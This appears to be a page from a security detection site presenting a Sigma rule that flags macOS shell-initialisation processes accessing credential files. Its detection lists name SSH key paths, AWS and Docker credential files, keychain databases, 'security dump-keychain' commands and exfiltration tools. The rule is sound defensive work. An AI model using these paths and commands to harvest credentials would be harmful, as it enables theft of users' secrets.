🍎 macOS

Potential Credential Exfiltration via Shell Configuration

Detects processes spawned from shell initialisation that access sensitive credential files. Attackers use .zshrc to automatically search for and exfiltrate SSH keys, AWS credentials, API tokens, keychain databases, and other sensitive authentication materials when a terminal is opened. This detection identifies suspicious file access patterns combined with credential-related commands.

Author: Chris S (avrgsec_)
Date: 2025-11-13
Level: CRITICAL
Status: experimental
T1552.001 T1552.004 T1555.001 T1041
📥 Download Sigma Rule

Sigma Rule

title: Potential Credential Exfiltration via Shell Configuration
id: 4d5e6f7a-8b9c-0d1e-2f3a-4b5c6d7e8f9a
status: experimental
description: |
  Detects processes spawned from shell initialisation that access sensitive credential files.
  Attackers use .zshrc to automatically search for and exfiltrate SSH keys, AWS credentials,
  API tokens, keychain databases, and other sensitive authentication materials when a terminal 
  is opened. This detection identifies suspicious file access patterns combined with 
  credential-related commands.
references:
  - https://attack.mitre.org/techniques/T1552/001/
  - https://attack.mitre.org/techniques/T1552/004/
  - https://attack.mitre.org/techniques/T1555/001/
  - https://avrgsec.me/detections/macos/keychain_db_staging_for_exfiltration/
  - https://avrgsec.me/detections/macos/suspicious_keychain_access_via_security_utility/
author: Chris S (avrgsec_)
date: "2025-11-13"
tags:
  - attack.t1552.001
  - attack.credential_access
  - attack.t1552.004
  - attack.t1555.001
  - attack.t1041
  - attack.exfiltration
logsource:
  category: process_creation
  product: macos
detection:
  selection_parent:
    ParentImage|endswith:
      - '/zsh'
      - '/bash'
  selection_credential_access:
    CommandLine|contains:
      - '.ssh/id_rsa'
      - '.ssh/id_ed25519'
      - '.ssh/id_ecdsa'
      - '.aws/credentials'
      - 'PRIVATE KEY'
      - '.docker/config.json'
      - '.kube/config'
      - 'token'
      - 'secret'
      - '.npmrc'
      - '.pypirc'
      - '.gitconfig'
      - 'login.keychain'
      - 'login.keychain-db'
      - '/Keychains/'
      - 'security dump-keychain'
      - 'security find-generic-password'
      - 'security find-internet-password'
  selection_tools:
    Image|endswith:
      - '/find'
      - '/grep'
      - '/cat'
      - '/tar'
      - '/zip'
      - '/curl'
      - '/scp'
      - '/base64'
      - '/security'
  filter_legit:
    CommandLine|contains:
      - '/brew'
      - '/oh-my-zsh'
      - 'update_terminal'
  condition: selection_parent and selection_credential_access and selection_tools and not filter_legit
falsepositives:
  - Legitimate backup scripts run at shell initialization
  - SSH key management tools
  - Development environment setup that configures credentials
  - Password managers accessing keychain
level: critical

False Positives

  • Legitimate backup scripts run at shell initialization
  • SSH key management tools
  • Development environment setup that configures credentials
  • Password managers accessing keychain

References

← Back to all detections